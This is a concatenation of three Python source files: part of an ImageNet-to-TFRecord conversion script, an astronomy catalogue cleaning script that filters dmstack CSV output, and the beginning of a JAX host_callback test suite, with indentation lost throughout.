# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch index to run; it lies within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain 0 or more entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128 and num_threads = 2, then the first
# thread would produce shards [0, 64).
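  # A further worked illustration (comment only; numbers are hypothetical):
  # with num_shards = 128 and num_threads = 8, each thread writes 16 shards,
  # so thread_index 3 writes shards 48..63, and the np.linspace call below
  # splits that thread's slice of the file list into 16 equal chunks.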
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain 0 or more entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain 0 or more entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist multiple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
b01_remove_nans_dmstack.py
|
# Author : Bhishan Poudel
# Date : July 5, 2019
# Update : Nov 7, 2019
# Description:
#===============
# Remove nans from dmstack output csv files and
# do some filterings to give txt files.
#
# Input/Outputs:
#=================
# inputs : ../data/dmstack_csv/*.csv (100*4 csv files)
# outputs: dmstack_txt/*.txt (100 combined txt files with a few columns)
#
# Filtering:
#============
# 1. column ==> deblend_nChild==0
# 2. flag ==> calib_psfCandidate==False **Read flag from json**
# 3. ellipticity ==> e = sqrt(e1^2 + e2^2) < 1.5
# 4. selection ==> choose only few columns
# 5. nans ==> remove nans from all selected columns
# 6. delimiter ==> change delimiter from space to tab for imcat
#
# Shape HSM Filtering:
#======================
# Nov 19, 2019
# Reference: https://github.com/LSSTDESC/DC2-analysis/blob/master/tutorials/object_gcr_2_lensing_cuts.ipynb
#
# 7. 'ext_shapeHSM_HsmShapeRegauss_resolution >= 0.3'
# 8. 'ext_shapeHSM_HsmShapeRegauss_sigma <= 0.4'
#
# Usage:
#=======
# py b01_remove_nans_dmstack.py
#
#
# Note:
# When reading the columns ext_shapeHSM_HsmShapeRegauss_e1 and e2
# we read them together as g in IMCAT, so the original
# reduced shear will be g = g/2.
#
import pandas as pd
import numpy as np
import os,sys
import glob
import json
import multiprocessing
from multiprocessing import Process
# constants
RANGE = 100
# global variables
dict_flags_all = json.load(open('dict_flags.json'))
# create output folder if not exist
if not os.path.isdir('dmstack_txt'):
os.makedirs('dmstack_txt')
def remove_nans(ifile,file_number):
""" Remove nans and filter data from dmstack output csv file.
There are 90 flags col0 to col89
col90 is id is first column 'id'
There are 90 flags and 77 columns.
We exclude first column 'flags' and have 76 columns
In total there are 90 + 76 = 166 columns.
Columns selected:
# flags only for filtering
1 : calib_psfCandidate (for filtering only)
94 : deblend_nChild (for filtering only)
# actual columns used
90 : id
102 : base_SdssCentroid_x
103 : base_SdssCentroid_y
104 : base_SdssCentroid_xSigma
105 : base_SdssCentroid_ySigma
114 : 'base_SdssShape_flux',
127 : ext_shapeHSM_HsmShapeRegauss_e1
128 : ext_shapeHSM_HsmShapeRegauss_e2
# Added on Nov19, 2019 for shape measurements
# https://github.com/LSSTDESC/DC2-analysis/blob/master/tutorials/object_gcr_2_lensing_cuts.ipynb
129: 'ext_shapeHSM_HsmShapeRegauss_sigma',
130: 'ext_shapeHSM_HsmShapeRegauss_resolution',
# Added for radius calculation
133: 'ext_shapeHSM_HsmSourceMoments_xx',
134: 'ext_shapeHSM_HsmSourceMoments_yy',
135: 'ext_shapeHSM_HsmSourceMoments_xy',
# This gives
radius = (xx*yy - xy**2)**0.25
# In the output file the columns are
# 1            2   3  4  5       6       7   8   9      10    11
# file_number, id, x, y, xsigma, ysigma, e1, e2, ellip, flux, radius
"""
df = pd.read_csv(ifile, sep=",",low_memory=False)
df.columns = df.columns.str.lstrip('# ')
# make dtype float
df = df.astype(float)
# select only few columns
usecols = [1, 94, 90, 102, 103, 104, 105,
127, 128, 129, 130, 114, 133, 134, 135]
df = df.iloc[:,usecols]
df = df.copy()
# make selected columns numeric
for c in df.columns:
df[c] = pd.to_numeric(df[c],errors='coerce')
# filter the flag calib_psfCandidate==False
# not a star candidate
df = df.query('calib_psfCandidate == 0.0')
# filter the column deblend_nChild==0
# no child source after deblending
df = df.query('deblend_nChild == 0.0')
# filter for HSM shapes
df = df.query('ext_shapeHSM_HsmShapeRegauss_resolution >= 0.3')
df = df.query('ext_shapeHSM_HsmShapeRegauss_sigma <= 0.4')
# clean out unphysical results
# e1^2 + e2^2 < 1.5^2
df = df.copy()
df['ellip'] = (df['ext_shapeHSM_HsmShapeRegauss_e1'] ** 2 +
df['ext_shapeHSM_HsmShapeRegauss_e2'] ** 2)**0.5
df = df.query('ellip < 1.5')
# calculate radius of ellipse using HSM moments
# radius**4 = xx*yy - xy**2
df['radius'] = df.eval(""" ( (ext_shapeHSM_HsmSourceMoments_xx * ext_shapeHSM_HsmSourceMoments_yy) \
- (ext_shapeHSM_HsmSourceMoments_xy**2 ) )**0.25 """)
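    # Illustrative check (comment only): for xx = yy = 4.0 and xy = 0.0 the
    # determinant xx*yy - xy**2 is 16.0, so radius = 16.0**0.25 = 2.0.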
# add a new column with file_number
df['file_number'] = file_number
# take only required columns
cols_select = ['file_number', 'id',
'base_SdssCentroid_x', 'base_SdssCentroid_y',
'base_SdssCentroid_xSigma','base_SdssCentroid_ySigma',
'ext_shapeHSM_HsmShapeRegauss_e1','ext_shapeHSM_HsmShapeRegauss_e2',
'ellip', 'base_SdssShape_flux', 'radius'
]
df = df[cols_select]
# drop all nans
df = df.dropna()
# write txt file with commented header
prefix = ' '*2
header_line = prefix.join(cols_select)
# from: ../data/dmstack_csv/src_lsst_mono_z1.5_000.csv
# to : dmstack_txt/src_lsst_mono_z1.5_000.txt
ofile = ifile.replace('../data/dmstack_csv', 'dmstack_txt')
ofile = ofile.replace('.csv', '.txt')
np.savetxt(ofile,df.values,header=header_line,delimiter='\t')
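# Illustrative sketch only (never called here): reading back one of the txt
# files written above. The file name is just an example taken from the
# comment in remove_nans; the columns follow the header written there.
def _read_dmstack_txt_sketch(txt_file='dmstack_txt/src_lsst_mono_z1.5_000.txt'):
    # genfromtxt skips the '#'-commented header by default and splits on the
    # tab delimiter used by np.savetxt above.
    data = np.genfromtxt(txt_file, delimiter='\t')
    # columns: file_number, id, x, y, xsigma, ysigma, e1, e2, ellip, flux, radius
    return data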
def func1():
infiles = ['../data/dmstack_csv/src_lsst_z1.5_{:03d}.csv'.format(i) for i in range(RANGE)]
for ifile in infiles:
file_number = int(ifile.rstrip('.csv').split('_')[-1])
remove_nans(ifile, file_number)
def func2():
infiles = ['../data/dmstack_csv/src_lsst90_z1.5_{:03d}.csv'.format(i) for i in range(RANGE)]
for ifile in infiles:
file_number = int(ifile.rstrip('.csv').split('_')[-1])
remove_nans(ifile, file_number)
def func3():
infiles = ['../data/dmstack_csv/src_lsst_mono_z1.5_{:03d}.csv'.format(i) for i in range(RANGE)]
for ifile in infiles:
file_number = int(ifile.rstrip('.csv').split('_')[-1])
remove_nans(ifile, file_number)
def func4():
infiles = ['../data/dmstack_csv/src_lsst_mono90_z1.5_{:03d}.csv'.format(i) for i in range(RANGE)]
for ifile in infiles:
file_number = int(ifile.rstrip('.csv').split('_')[-1])
remove_nans(ifile, file_number)
if __name__ == '__main__':
p1 = Process(target=func1)
p1.start()
p2 = Process(target=func2)
p2.start()
p3 = Process(target=func3)
p3.start()
p4 = Process(target=func4)
p4.start()
# join them all
p1.join()
p2.join()
p3.join()
p4.join()
|
host_callback_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
from unittest import skip, SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import core
from jax._src import api
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax.experimental import PartitionSpec as P
from jax.experimental import maps
from jax.experimental import pjit
from jax import lax
from jax import numpy as jnp
from jax import test_util as jtu
from jax import tree_util
from jax.lib import xla_bridge
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self._test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self._test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r".*device: (\S+)", s)
if m:
by_device.append((m.group(1), []))
assert by_device, f"output does not include 'device:': {self._output}"
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
testing_stream = _TestingOutputStream()
def fun1(a):
"""Function used for several `id_tap` tests."""
y = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
y = hcb.id_print(y * 3., what="y * 3", output_stream=testing_stream, result=y)
return y ** 2 # Some computation to make the gradient interesting
def fun1_equiv(a): # Numerical equivalent of fun1
return (a * 2.) ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
"""Conditionally print on testing_string"""
if do_print:
return hcb.id_print(arg, what=what,
output_stream=testing_stream, tap_with_device=tap_with_device)
else:
return arg
def local_devices():
# Tests require using not more than 2 devices.
return api.local_devices()[:2]
ignore_jit_of_pmap_warning = partial(
jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
expected: str, what: str):
"""A variant that preprocesses the string to eliminate non-determinism in
floating point values, and several uninteresting id_tap primitive params.
"""
# Sometimes we get floating points in the output; we round them
def repl_floats(match_group):
matched = match_group.group(0)
if matched == ".": return matched
x = np.around(float(matched), decimals=2)
return f"{x:.2f}"
what = re.sub(r"\-?\d*\.[\-\def]*", repl_floats, what)
what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
what = re.sub(r"bwd=[^\]\n]*", "", what)
what = re.sub(r"out_trees=[^\]\n]*", "", what)
what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
# Empty lines
what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
def repl_func(match_group):
matched = match_group.group(3)
if "function _print_consumer" in matched:
return match_group.group(1) + "=_print"
else:
return match_group.group(1) + "=..."
what = re.sub(r"((tap_func_)|(callback))=([^\]\n,]*),?", repl_func, what)
tst.assertMultiLineStrippedEqual(expected, what)
def helper_set_hlo_dump():
flags_str = os.getenv("XLA_FLAGS", "")
import shutil
dump_dir = "/tmp/xla_dump"
os.environ["XLA_FLAGS"] = f"{flags_str} --xla_dump_to={dump_dir}"
if os.path.isdir(dump_dir):
logging.warning(f"Deleting old XLA dump directory {dump_dir}")
shutil.rmtree(dump_dir)
logging.warning(f"Setting XLA dump directory {dump_dir}")
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
backend = api.lib.xla_bridge.get_backend()
c = api.xla_computation(fun)(*args)
print(re.sub(r", metadata.*", "",
backend.compile(c).hlo_modules()[0].to_string()))
def helper_log_ir(name,
f_jax,
*args,
num_partitions=None,
strip_metadata=False):
print(f"Jaxpr[{name}]: {jax.make_jaxpr(f_jax)(*args)}")
jax_comp = jax.xla_computation(f_jax)(*args)
print(f"HLO[{name}]: {jax_comp.as_hlo_text()}")
backend = jax.lib.xla_bridge.get_backend()
if num_partitions is not None:
num_replicas = 1
device_assignment = np.arange(num_partitions * num_replicas)
device_assignment = np.reshape(device_assignment, (-1, num_partitions))
use_spmd_partitioning = num_partitions > 1
compile_options = jax.lib.xla_bridge.get_compile_options(
num_replicas=num_replicas,
num_partitions=num_partitions,
device_assignment=device_assignment,
use_spmd_partitioning=use_spmd_partitioning,
)
else:
compile_options = None
jax_optimized_hlo = backend.compile(
jax_comp, compile_options).hlo_modules()[0].to_string()
if strip_metadata:
jax_optimized_hlo = re.sub(r", metadata.*", "", jax_optimized_hlo)
print(f"Optimized HLO[{name}] for "
f"platform {backend.platform}: {jax_optimized_hlo}")
prev_xla_flags = None
def setUpModule():
global prev_xla_flags
# This will control the CPU devices. On TPU we always have 2 devices
prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
expected_2CPUs: str):
"""Check that the multi-device output is equal to the expected.
The tests run with 2 devices if available, otherwise 1 device.
We adjust the expected output here for 1 device.
Args:
expected_2CPUs: the expected output for 2 CPUs. If there is only
one device, this is trimmed to the first device. If the current
device_under_test is not a CPU, then we change the device names accordingly.
"""
expected = expected_2CPUs
if len(local_devices()) == 1:
start_device_1 = expected.find('device: cpu:1')
if start_device_1 >= 0:
expected = expected[0:start_device_1]
def replace_device_name(m) -> str:
return str(local_devices()[int(m.group(1))])
expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
what = testing_stream.output_sorted_by_device
return assertMultiLineStrippedEqual(tst, expected, what)
class HostCallbackTapTest(jtu.JaxTestCase):
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
self.old_flags = os.getenv("XLA_FLAGS", "")
def tearDown(self) -> None:
if os.getenv("XLA_FLAGS") != self.old_flags:
os.environ["XLA_FLAGS"] = self.old_flags
xla_bridge.get_backend.cache_clear()
hcb.barrier_wait("HostCallbackTapTest.tearDown")
super().tearDown()
def test_tap_eval(self):
self.assertAllClose((5. * 2.) ** 2, fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_with_tuple_results(self):
def func2(x):
x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
return x1 + y1
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
def test_tap_with_dict_results(self):
def func2(x):
res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
return res["a"] + res["b"]
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ a=6.00
b=9.00 }""", testing_stream.output)
def test_tap_with_result(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
def test_tap_with_result_no_arg(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
x1 = hcb.id_tap(tap_func, None, result=x)
return x1
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_result_unused(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
hcb.id_tap(tap_func, None)
return x
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_with_device(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream,
tap_with_device=True)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiDeviceOutputEqual(self, """
device: cpu:0
( 6.00
9.00 )""")
def test_tap_eval_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise ValueError("Some user message")
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile("There were exceptions during callback processing. Last one was:.*"
"ValueError: Some user message", re.DOTALL)):
func(0)
hcb.barrier_wait()
# We should have received everything before the error
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_empty(self):
"""Tap empty arrays."""
hcb.id_print((), output_stream=testing_stream)
hcb.id_print((1., np.ones((2, 0))), what="second", output_stream=testing_stream)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( )
what: second
( 1.00
[] )""", testing_stream.output)
def test_tap_jit_simple(self):
jit_fun1 = api.jit(lambda x: 3. * hcb.id_print(
2. * x, what="here", output_stream=testing_stream))
self.assertAllClose(6. * 5., jit_fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: here
10.00""", testing_stream.output)
def test_tap_jit_no_invars(self):
def func(): # jitted function does not take arguments
return hcb.id_print(42, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)())
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_multiple_invars(self):
def func(x1, x2):
return hcb.id_print(x1 + x2, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)(40, 2))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_constant(self):
def func(x):
return hcb.id_print(42, result=x, output_stream=testing_stream)
self.assertAllClose(5, api.jit(func)(5))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_sequence1(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
logging.info("%s: %s", self._testMethodName,
api.make_jaxpr(func)(1))
logging.info("%s: %s", self._testMethodName,
api.xla_computation(func)(1).as_hlo_text())
self.assertEqual(2, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2""", testing_stream.output)
def test_tap_jit2(self):
"""A sequence of JIT."""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
return x2
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_result_unused(self):
"""We can id_print even if we don't use the result."""
def func(x):
hcb.id_print(x, where="1", output_stream=testing_stream)
hcb.id_print(x + 1, where="2", output_stream=testing_stream)
return x + 1
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_nested(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
def func_nested(x):
x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
return x2
x3 = api.jit(func_nested)(x1)
return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: nested
2
where: 3
3""", testing_stream.output)
def test_tap_jit_devices(self):
"""Running on multiple devices."""
logging.info(f"{self._testMethodName}: has devices {local_devices()}")
def func(x, device_id):
x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
return x2
for d in local_devices():
self.assertEqual(112, api.jit(func, device=d, static_argnums=1)(111, d.id))
hcb.barrier_wait()
